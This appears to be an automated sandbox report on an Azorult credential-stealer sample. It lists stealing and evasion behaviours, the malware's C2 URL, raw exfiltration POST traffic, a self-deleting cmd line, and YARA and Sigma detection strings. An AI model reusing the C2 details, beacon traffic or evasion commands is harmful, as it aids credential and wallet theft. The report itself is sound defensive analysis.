Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Po#70831.exe

Overview

General Information

Sample name:Po#70831.exe
Analysis ID:1501074
MD5:bde0b7ff5003da14df7675564d5a8f6a
SHA1:e72691a96a386c72392375969f0426361e167d3b
SHA256:af44fccdfe3d6e7f65283d47f4a121bd70000dbcf1d8d91aead1c124cd808554
Tags:exe
Infos:

Detection

Azorult
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Azorult
Yara detected Azorult Info Stealer
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
OS version to string mapping found (often used in BOTs)
PE file contains sections with non-standard names
PE file does not import any functions
Potential key logger detected (key state polling based)
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Po#70831.exe (PID: 6900 cmdline: "C:\Users\user\Desktop\Po#70831.exe" MD5: BDE0B7FF5003DA14DF7675564D5A8F6A)
    • svchost.exe (PID: 4396 cmdline: "C:\Users\user\Desktop\Po#70831.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • cmd.exe (PID: 4488 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "svchost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 2324 cmdline: C:\Windows\system32\timeout.exe 3 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AzorultAZORult is a credential and payment card information stealer. Among other things, version 2 added support for .bit-domains. It has been observed in conjunction with Chthonic as well as being dropped by Ramnit.
  • The Gorgon Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult

Malware Configuration

Threatname: Azorult

{"C2 url": "http://ln6b9.shop/LN341/index.php"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.2483316959.0000000004DA0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Azorult_1Yara detected AzorultJoe Security
    00000002.00000002.2484833657.00000000067AC000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Azorult_1Yara detected AzorultJoe Security
      00000002.00000002.2483360582.0000000004DC0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Azorult_1Yara detected AzorultJoe Security
        00000002.00000002.2482219448.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_AzorultYara detected Azorult Info StealerJoe Security
          00000002.00000002.2482219448.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_Azorult_1Yara detected AzorultJoe Security
            Click to see the 15 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.Po#70831.exe.36e0000.1.unpackJoeSecurity_AzorultYara detected Azorult Info StealerJoe Security
              0.2.Po#70831.exe.36e0000.1.unpackJoeSecurity_Azorult_1Yara detected AzorultJoe Security
                0.2.Po#70831.exe.36e0000.1.unpackWindows_Trojan_Azorult_38fce9eaunknownunknown
                • 0x18c50:$a1: /c %WINDIR%\system32\timeout.exe 3 & del "
                • 0xbf78:$a2: %APPDATA%\.purple\accounts.xml
                • 0xc6c0:$a3: %TEMP%\curbuf.dat
                • 0x189d4:$a4: PasswordsList.txt
                • 0x139d8:$a5: Software\Valve\Steam
                0.2.Po#70831.exe.36e0000.1.unpackAzorult_1Azorult Payloadkevoreilly
                • 0x17078:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ...
                • 0x114ac:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
                0.2.Po#70831.exe.36e0000.1.unpackAzorultdetect Azorult in memoryJPCERT/CC Incident Response Group
                • 0x16e18:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                • 0x17478:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                • 0x18b60:$v2: http://ip-api.com/json
                • 0x177d2:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
                Click to see the 21 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Po#70831.exe", CommandLine: "C:\Users\user\Desktop\Po#70831.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Po#70831.exe", ParentImage: C:\Users\user\Desktop\Po#70831.exe, ParentProcessId: 6900, ParentProcessName: Po#70831.exe, ProcessCommandLine: "C:\Users\user\Desktop\Po#70831.exe", ProcessId: 4396, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Po#70831.exe", CommandLine: "C:\Users\user\Desktop\Po#70831.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Po#70831.exe", ParentImage: C:\Users\user\Desktop\Po#70831.exe, ParentProcessId: 6900, ParentProcessName: Po#70831.exe, ProcessCommandLine: "C:\Users\user\Desktop\Po#70831.exe", ProcessId: 4396, ProcessName: svchost.exe

                Suricata Signatures

                Timestamp:2024-08-29T12:02:33.732607+0200
                SID:2029136
                Severity:1
                Source Port:80
                Destination Port:49717
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-08-29T12:02:42.498882+0200
                SID:2029467
                Severity:1
                Source Port:49718
                Destination Port:80
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-08-29T12:02:33.484339+0200
                SID:2029467
                Severity:1
                Source Port:49717
                Destination Port:80
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-08-29T12:02:33.484339+0200
                SID:2810276
                Severity:1
                Source Port:49717
                Destination Port:80
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://ln6b9.shop/LN341/index.phpAvira URL Cloud: Label: malware
                Found malware configuration
                Source: 00000000.00000002.2377127925.00000000036E0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Azorult {"C2 url": "http://ln6b9.shop/LN341/index.php"}
                Multi AV Scanner detection for domain / URL
                Source: http://ln6b9.shop/LN341/index.phpVirustotal: Detection: 9%Perma Link
                Multi AV Scanner detection for submitted file
                Source: Po#70831.exeVirustotal: Detection: 33%Perma Link
                Source: Po#70831.exeReversingLabs: Detection: 71%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: Po#70831.exeJoe Sandbox ML: detected
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004094C4 CryptUnprotectData,LocalFree,2_2_004094C4
                Source: Po#70831.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.2.dr
                Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, mozglue.dll.2.dr
                Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.2.dr
                Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.2.dr
                Source: Binary string: ucrtbase.pdb source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, ucrtbase.dll.2.dr
                Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-memory-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-debug-l1-1-0.dll.2.dr
                Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.2.dr
                Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.2.dr
                Source: Binary string: wntdll.pdb source: Po#70831.exe, 00000000.00000003.2368245174.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, Po#70831.exe, 00000000.00000003.2368365177.0000000003C50000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-synch-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-environment-l1-1-0.dll.2.dr
                Source: Binary string: vcruntime140.i386.pdbGCTL source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.2.dr
                Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, mozglue.dll.2.dr
                Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.2.dr
                Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.2.dr
                Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-private-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.2.dr
                Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.2.dr
                Source: Binary string: msvcp140.i386.pdb source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, msvcp140.dll.2.dr
                Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.2.dr
                Source: Binary string: ucrtbase.pdbUGP source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, ucrtbase.dll.2.dr
                Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-time-l1-1-0.dll.2.dr
                Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.2.dr
                Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.2.dr
                Source: Binary string: wntdll.pdbUGP source: Po#70831.exe, 00000000.00000003.2368245174.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, Po#70831.exe, 00000000.00000003.2368365177.0000000003C50000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-datetime-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.2.dr
                Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.2.dr
                Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.2.dr
                Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.2.dr
                Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.2.dr
                Source: Binary string: vcruntime140.i386.pdb source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.2.dr
                Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-utility-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-timezone-l1-1-0.dll.2.dr
                Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.2.dr
                Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-string-l1-1-0.dll.2.dr
                Source: Binary string: msvcp140.i386.pdbGCTL source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, msvcp140.dll.2.dr
                Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l2-1-0.dll.2.dr
                Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-heap-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.2.dr
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004FDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_004FDBBE
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004CC2A2 FindFirstFileExW,0_2_004CC2A2
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_005068EE FindFirstFileW,FindClose,0_2_005068EE
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_0050698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0050698F
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004FD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_004FD076
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004FD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_004FD3A9
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_00509642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00509642
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_0050979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0050979D
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_00509B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00509B2B
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_00505C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00505C97
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004098A0 FindFirstFileW,FindNextFileW,FindClose,2_2_004098A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D0A0 FindFirstFileW,2_2_0040D0A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,2_2_00414408
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00408D44 FindFirstFileW,GetFileAttributesW,FindNextFileW,2_2_00408D44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00415610 FindFirstFileW,FindNextFileW,FindClose,2_2_00415610
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004087DC FreeLibrary,FindFirstFileW,DeleteFileW,FindNextFileW,SetCurrentDirectoryW,RemoveDirectoryW,2_2_004087DC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D06E FindFirstFileW,2_2_0040D06E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041303C FindFirstFileW,FindNextFileW,FindClose,2_2_0041303C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040989F FindFirstFileW,FindNextFileW,FindClose,2_2_0040989F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004111C4 FindFirstFileW,FindNextFileW,FindClose,2_2_004111C4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,2_2_00414408
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00415610 FindFirstFileW,FindNextFileW,FindClose,2_2_00415610
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,2_2_00412D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,2_2_00412D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00408D3C FindFirstFileW,GetFileAttributesW,FindNextFileW,2_2_00408D3C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,2_2_00412D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041158C FindFirstFileW,FindNextFileW,FindClose,2_2_0041158C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00411590 FindFirstFileW,FindNextFileW,FindClose,2_2_00411590
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00412D9C FindFirstFileW,FindNextFileW,FindClose,2_2_00412D9C

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2029467 - Severity 1 - ET MALWARE Win32/AZORult V3.3 Client Checkin M14 : 192.168.2.6:49717 -> 172.67.128.117:80
                Source: Network trafficSuricata IDS: 2810276 - Severity 1 - ETPRO MALWARE AZORult CnC Beacon M1 : 192.168.2.6:49717 -> 172.67.128.117:80
                Source: Network trafficSuricata IDS: 2029136 - Severity 1 - ET MALWARE AZORult v3.3 Server Response M1 : 172.67.128.117:80 -> 192.168.2.6:49717
                Source: Network trafficSuricata IDS: 2029467 - Severity 1 - ET MALWARE Win32/AZORult V3.3 Client Checkin M14 : 192.168.2.6:49718 -> 172.67.128.117:80
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.128.117 80Jump to behavior
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://ln6b9.shop/LN341/index.php
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: global trafficHTTP traffic detected: POST /LN341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: ln6b9.shopContent-Length: 109Cache-Control: no-cacheData Raw: 00 00 00 45 14 8b 30 62 ef 26 66 9a 26 66 9a 46 70 9d 35 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 62 ef 26 66 99 26 66 9a 26 66 9f 26 66 9e 26 66 99 26 66 97 26 67 ea 46 13 8b 30 67 ed 45 17 8b 30 60 8b 30 66 8b 31 11 ef 26 66 96 42 70 9d 35 70 9d 3a 70 9d 32 70 9d 34 70 9d 3b Data Ascii: E0b&f&fFp5pGp:p7p2p7p:p3p410b&f&f&f&f&f&f&gF0gE0`0f1&fBp5p:p2p4p;
                Source: global trafficHTTP traffic detected: POST /LN341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: ln6b9.shopContent-Length: 33917Cache-Control: no-cache
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_0050CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_0050CE44
                Source: global trafficDNS traffic detected: DNS query: ln6b9.shop
